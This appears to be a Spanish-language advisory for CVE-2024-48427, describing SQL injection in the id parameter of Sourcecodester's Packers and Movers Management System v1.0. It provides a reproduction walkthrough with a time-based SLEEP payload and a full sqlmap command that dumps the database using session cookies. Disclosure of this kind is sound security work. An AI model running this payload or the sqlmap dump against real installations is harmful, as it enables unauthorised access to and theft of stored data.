CVE-2024-48427
Descripción
Una vulnerabilidad de inyección SQL en Sourcecodester Packers and Movers Management System v1.0 permite a usuarios remotos autenticados ejecutar comandos SQL arbitrarios a través del parámetro id en /mpms/admin/?page=services/manage_service&id
Tipo de Vulnerabilidad
Inyección SQL
Proveedor del Producto
Sourcecodester
Base de Código del Producto Afectado:
https://www.sourcecodester.com/php/15360/packers-and-movers-management-system-phpoop-free-source-code.html - 1.0
Componente Afectado:
El parámetro id de Actualizar Detalles del Servicio en /mpms/admin/?page=services/manage_service&id
Vectores de Ataque:
- Configure la aplicación localmente e inicie sesión en el panel de administración utilizando las credenciales predeterminadas proporcionadas.
- Navegue a la página vulnerable: http://localhost/mpms/admin/?page=services/manage_service&id=2
- Inyecte el payload SQL en el parámetro id: http://localhost/mpms/admin/?page=services/manage_service&id=1' OR SLEEP(5)-- puNr
- Observe la respuesta de la aplicación: la página debería tardar notablemente más (5 segundos) en cargar si la inyección es exitosa, lo que confirma que el parámetro id es vulnerable a la inyección SQL.
- Ahora ejecute la herramienta SQLMap para volcar los detalles de la base de datos:
- sqlmap -u "http://localhost/mpms/admin/?page=services/manage_service&id=1" --cookie="phpMyAdmin=ju34bd3d8q0jdf6td4ntqscaqd;PHPSESSID=eopn8q1p8c1f5m1v5igjoir8k1;" --dbms mysql -p id --risk 3 --level 4 --dbs --dump
Referencia:
- https://owasp.org/www-community/attacks/SQL_Injection
- https://portswigger.net/web-security/sql-injection